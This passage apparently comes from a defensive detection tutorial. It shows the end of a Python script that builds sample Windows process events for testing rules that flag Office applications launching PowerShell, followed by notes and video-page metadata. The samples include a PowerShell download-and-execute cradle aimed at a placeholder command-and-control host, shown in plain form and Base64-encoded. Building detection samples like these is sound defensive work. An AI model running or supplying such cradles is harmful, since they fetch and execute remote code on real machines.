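    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events. The URL is a reserved .invalid placeholder, not a real server.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/client.ps1')"
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [
    # 0: benign, a user opening a document
    ProcessEvent(r"C:\Windows\explorer.exe", OFFICE + r"\WINWORD.EXE", '"WINWORD.EXE" /n resume.docx'),
    # 1: IQY scenario, Excel hands a plaintext download one-liner to cmd.exe
    ProcessEvent(OFFICE + r"\EXCEL.EXE", SYS32 + r"\cmd.exe",
                 'cmd.exe /c powershell -NoP -W Hidden -c "' + CRADLE + '"'),
    # 2: macro scenario, Word launches PowerShell with the cradle Base64-encoded
    ProcessEvent(OFFICE + r"\WINWORD.EXE", SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoP -W Hidden -enc " + encode_for_sample(CRADLE)),
    # 3: encoded but harmless, an admin one-liner that must not trip the download rule
    ProcessEvent(r"C:\Windows\explorer.exe", SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -enc " + encode_for_sample("Get-Process | Select-Object -First 3")),
]


def run_samples() -> dict:
    """Map each sample index to the list of rule names that fired for it."""
    return {i: [f.rule for f in analyze(e)] for i, e in enumerate(SAMPLE_EVENTS)}


if __name__ == "__main__":
    for i, event in enumerate(SAMPLE_EVENTS):
        print(i, [(f.rule, f.detail) for f in analyze(event)])
```

Sample 3 is the reason the decode step matters in both directions: an encoded command is worth recording as evidence, but it is the recovered text, not the Base64 blob, that decides whether the download rule fires, so a legitimate encoded admin script is logged without being flagged as a cradle. Real EDR telemetry would also carry the process tree and timestamps, which is what lets a response action terminate the parent Office process as well as the interpreter.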
Info
Channel: Cylance Inc.
Views: 658
Rating: 5 out of 5
Keywords: BBCY, BlackBerry, Cylance, BlackBerry Cylance, Cylance Inc, Cybersecurity, Security, Antivirus, AV, anti virus, Black Hat, worm, trojan, ransomware, demo, malware, next gen, Stuart McClure
Id: RW4ltLxKTrU
Length: 57min 16sec (3436 seconds)
Published: Tue Jun 11 2019